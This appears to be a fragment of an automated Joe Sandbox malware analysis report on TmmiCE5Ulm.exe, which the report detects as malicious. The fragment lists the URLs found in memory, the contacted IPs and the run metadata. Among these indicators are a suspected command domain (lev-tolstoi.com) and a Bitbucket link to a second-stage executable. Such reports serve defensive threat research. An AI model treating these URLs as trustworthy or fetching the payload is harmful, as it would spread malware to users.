                                                                                                      https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://aui-cdn.atlassian.com/TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://s.ytimg.com;TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://lev-tolstoi.com/dTmmiCE5Ulm.exe, 00000000.00000003.2334229101.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2228599565.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.0000000001193000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://steam.tv/TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://lev-tolstoi.com/pi:TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001161000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://lev-tolstoi.com/bTmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://bitbucket.org/TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688197419.00000000011AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netTmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeTmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001128000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://lev-tolstoi.com/TmmiCE5Ulm.exe, 00000000.00000003.2270145793.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2231698697.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2689933527.0000000005A80000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://store.steampowered.com/privacy_agreement/TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://store.steampowered.com/points/shop/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://ocsp.rootca1.amazontrust.com0:TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://lev-tolstoi.com/tFTmmiCE5Ulm.exe, 00000000.00000003.2204525623.0000000001193000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://nsis.sf.net/NSIS_ErrorErrorTmmiCE5Ulm.exe, 00000000.00000002.2691243318.0000000006179000.00000002.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409055917.0000000005B3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://sketchfab.comTmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.ecosia.org/newtab/TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://lv.queniujq.cnTmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brTmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.youtube.com/TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://store.steampowered.com/privacy_agreement/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netTmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://cdn.cookielaw.org/TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.google.com/recaptcha/TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://checkout.steampowered.com/TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refTmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://store.steampowered.com/;TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-pg=qTmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://store.steampowered.com/about/TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://steamcommunity.com/my/wishlist/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001188000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B01000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001143000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exefTmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://help.steampowered.com/en/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://steamcommunity.com/market/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://store.steampowered.com/news/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiTmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=eTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe_1TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001149000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://recaptcha.net/recaptcha/;TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netTmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://steamcommunity.com/discussions/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://lev-tolstoi.com/=9TmmiCE5Ulm.exe, 00000000.00000002.2689933527.0000000005A80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://store.steampowered.com/stats/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://medal.tvTmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://broadcast.st.dl.eccdnx.comTmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngTmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aTmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://remote-app-switcher.prod-east.frontend.public.atl-paas.netTmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              http://x1.c.lencr.org/0TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                http://x1.i.lencr.org/0TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0TmmiCE5Ulm.exe, 00000000.00000002.2687761991.0000000000DDA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                    104.21.66.86
                                                                                                                                                                                                                                                    lev-tolstoi.comUnited States
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    23.55.153.106
                                                                                                                                                                                                                                                    steamcommunity.comUnited States
                                                                                                                                                                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                    185.166.143.49
                                                                                                                                                                                                                                                    bitbucket.orgGermany
                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                    3.5.16.86
                                                                                                                                                                                                                                                    s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                    Analysis ID:1579676
                                                                                                                                                                                                                                                    Start date and time:2024-12-23 07:25:26 +01:00
                                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                    Overall analysis duration:0h 6m 8s
                                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                    Number of analysed new started processes analysed:8
                                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                                    Sample name:TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                                                                    Original Sample Name:39a156657be03cc94d69874b25836b8c.exe
                                                                                                                                                                                                                                                    Detection:MAL
